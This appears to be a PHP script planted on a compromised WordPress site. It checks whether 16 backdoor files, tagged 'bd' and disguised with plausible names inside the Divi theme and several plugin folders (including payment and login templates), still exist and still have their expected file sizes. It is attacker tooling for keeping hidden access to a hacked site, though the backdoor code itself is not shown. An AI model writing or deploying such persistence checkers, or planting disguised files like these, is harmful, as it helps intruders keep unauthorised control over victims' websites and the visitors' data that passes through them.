<?php   $r = '/home/bestseocompany/public_html/ajspalette.com'; $x = ["/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/cart/cart.totals.php"=>"bd@@18709@@949",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/query/8.5.php"=>"bd@@14618@@1019",
"/wp-content/plugins/all-in-one-seo-pack/vendor_prefixed/monolog/monolog/src/Monolog/Handler/FingersCrossed/suggestcategory.php"=>"bd@@16162@@986",
"/wp-content/themes/Divi/includes/builder/frontend-builder/assets/vendors/plugins/emoticons/img/help_about.php"=>"bd@@14125@@1009",
"/wp-content/plugins/fluentform/vendor/wpfluent/framework/src/WPFluent/Database/Query/links.php"=>"bd@@20819@@938",
"/wp-content/themes/Divi/includes/builder/module/field/attribute/composite/type/StringHash.php"=>"bd@@15205@@1011",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/taxonomy/vim.php"=>"bd@@17510@@994",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/type/gpcvar.php"=>"bd@@27002@@918",
"/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/global/form.login.php"=>"bd@@25734@@884",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/query/admincp.php"=>"bd@@50063@@888",
"/wp-content/plugins/fluentform/app/Services/Libraries/action-scheduler/classes/data-stores/cma_m_bulk.php"=>"bd@@50078@@893",
"/wp-content/plugins/fluentform/app/Services/Spout/Reader/XLSX/Helper/SharedStringsCaching/wmp.php"=>"bd@@50083@@970",
"/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/checkout/payment.order.php"=>"bd@@50091@@874",
"/wp-content/plugins/all-in-one-seo-pack/vendor_prefixed/monolog/monolog/src/Monolog/Handler/Slack/header.bak.php"=>"bd@@50103@@994",
"/wp-content/plugins/fluentform/app/Services/Libraries/action-scheduler/classes/actions/ActionScheduler.Action.php"=>"bd@@14796@@898",
"/wp-content/plugins/fluentform/app/Modules/Payments/PaymentMethods/Stripe/Components/_conf.php"=>"bd@@15573@@1028"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 